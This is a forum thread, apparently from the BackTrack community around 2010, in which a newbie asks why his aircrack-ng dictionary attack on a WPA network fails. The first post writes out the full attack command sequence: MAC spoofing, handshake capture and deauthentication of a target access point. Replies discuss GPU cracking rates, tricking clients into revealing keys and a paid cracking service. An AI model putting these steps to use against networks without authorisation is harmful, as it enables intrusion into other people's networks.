
Thread: Passphrase not in dictionary???!?!?


  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Passphrase not in dictionary???!?!?

    Hey.

    I'm a newbie, just spent a lot of hours trying to hack a wireless network. I'm using a BackTrack 4 ISO live CD to boot into BackTrack 4. I've spent a lot of hours reading a lot of "how to" guides, and I finally figured out how to do it. But when aircrack started to "hack" the password, it just said "Passphrase not in dictionary" after it tested 270 keys.

    This is what I do:
    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airodump-ng wlan0

    # then I choose a target (channel, bssid, essid) #

    airodump-ng -c 11 -w wpa -bssid 00:26:18:90:1D:4D wlan0

    # then I open another shell #

    aireplay-ng -0 5 -a 00:26:18:90:1D:4D wlan0

    # then I get a WPA handshake #

    aircrack-ng wpa-01.cap -w /pentest/wireless/aircrack-ng/test/password.lst

    Then aircrack starts properly, I think, and tests about 270 keys in less than 1 sec, and then it says: Passphrase not in dictionary, quitting aircrack

    What do I have to do?

    Rasmus

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    ..

    Okay, now I found a password list with about 1 million passwords, and aircrack ran for about 3 hours, but still didn't find the key? Is it possible to find a WPA key ???

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    hmm..

    Okay, I kinda get the whole thing now..! The password list that comes with the BackTrack live CD is just kind of a "test" list, a really short one. I found some lists with more than 10 million different combinations, but that doesn't make any sense? It will take days, maybe even weeks for aircrack to test all the words - and that's no guarantee of finding the right one... And the lists only have proper words, not keys like: a5Gi877KgP1gH3 <- something like that. There has to be an easier way to crack a WPA, maybe something to do with the WPA handshake or some kind of program that tries every possible combination from 8-63 letters, both lower case, higher case, numbers and whatever else it is possible for a password to have in it. Can somebody help me out here?

  4. #4
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3


    You can try a generator to narrow down your combinations, run the cracker for days, or think of some other way to get the client to give you the password...
    Use your imagination!

  5. #5
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535


    Quote Originally Posted by rallianto View Post
    Okay, I kinda get the whole thing now..! The password list that comes with the BackTrack live CD is just kind of a "test" list, a really short one. I found some lists with more than 10 million different combinations, but that doesn't make any sense? It will take days, maybe even weeks for aircrack to test all the words - and that's no guarantee of finding the right one... And the lists only have proper words, not keys like: a5Gi877KgP1gH3 <- something like that. There has to be an easier way to crack a WPA, maybe something to do with the WPA handshake or some kind of program that tries every possible combination from 8-63 letters, both lower case, higher case, numbers and whatever else it is possible for a password to have in it. Can somebody help me out here?
    Did you try putting the correct passphrase in your list?
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  6. #6
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    3


    I have the same problem. I have a handshake, tried 3 dictionaries, 2x <10 million entries, one big 60 million. Still no result. Here in my country we speak Bulgarian. So it is possible that the pass is something not in English, and the lists are generally for English. I will try a test with numbers only, but it will take a long time.


    If you want to try all the possibilities you will need around....few billion years.
    My computer tries 1500 pass/sec. It has a Core 2 Duo 3.00GHz Intel. But with my CUDA-enabled NVIDIA 9600GT I can go for up to 3100 passwords/s only with it.
    So overall I reach ~4K. But there are many many many combinations.
    Even with CUDA the computer spent 5 hours on the large list.
    To try each numeric combination with 8 digits (100 000 000) my PC will need 7 hours. With 9 digits, 70. With 10, 700 hours!!!
    With letters it is even harder. I will need 21 months only for 8 digits.
    And for "only" 20 I will need....160173521855785540 years. Even if you get 4 monster video cards you have no chance....yet.
    Here is a time calculator: lastbit.com/jscalc.asp

  7. #7
    Member
    Join Date
    Mar 2010
    Location
    /dev/null
    Posts
    455


    Quote Originally Posted by rallianto View Post
    I found some lists with more than 10 million different combinations, but that doesn't make any sense? It will take days, maybe even weeks for aircrack to test all the words - and that's no guarantee of finding the right one...
    Rather years I'd say... That's why WPA is still considered to be safe... If you want something faster, look under your AP box or set the security "level" to WEP...

  8. #8
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012


    Not one part is a bug or a fix.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  9. #9
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526


    Quote Originally Posted by ~LCF~ View Post
    Rather years I'd say... That's why WPA is still considered to be safe... If you want something faster, look under your AP box or set the security "level" to WEP...
    WPA is not considered safe, at least not by me, and I'm not talking about TBs of drive space, cracking clouds, FPGAs, server/GPU arrays, etc. WPA is useless now, to a smart little falsification attack taking 10-20 minutes. This being said, for the average auditor the best chance one has is to use an online WPA auditing service.
    PureH@te runs pretty much the best online WPA audit available right now, save yourself the time, MONEY, and effort and use his service for a mere $10. Available here
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.
